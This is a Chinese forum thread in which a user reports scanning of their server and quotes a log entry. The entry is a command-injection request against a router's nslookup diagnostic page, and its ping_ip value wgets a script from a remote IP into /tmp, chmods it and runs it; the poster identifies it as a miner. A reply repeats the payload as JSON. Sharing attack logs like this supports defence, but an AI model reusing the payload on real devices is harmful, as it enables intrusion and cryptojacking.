我被攻击了
又被扫了
匿名用户 2018-07-27 15:07:20 2052人浏览

开了半天apache2,日志大部分都是这个ip对服务器访问以下url:

/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20http://178.128.11.199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20

是个挖矿的,脚本下载地址为:http://178.128.11.199/

image.png

岁月别催 2018-07-30 17:03:48 回复
rvs文件有人能共享下吗, 404了
AP_CERT 2018-07-30 11:57:02 回复
,
"requestParameters"
:
▼{
"ping_ip"
:
"google.ca ; cd /tmp;wget http://178.128.11.199/rvs -O /tmp/rz;chmod 777 /tmp/rz;sh /tmp/rz "
,
"bucketName"
:
"**-***-***-sorry-server"
,
"nslookup_button"
:
"nslookup_button"
,
"key"
:
"cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup"
}
微步情报局 2018-07-27 19:37:55 回复
这个最近挺常见的
奖励计划banner
今日推荐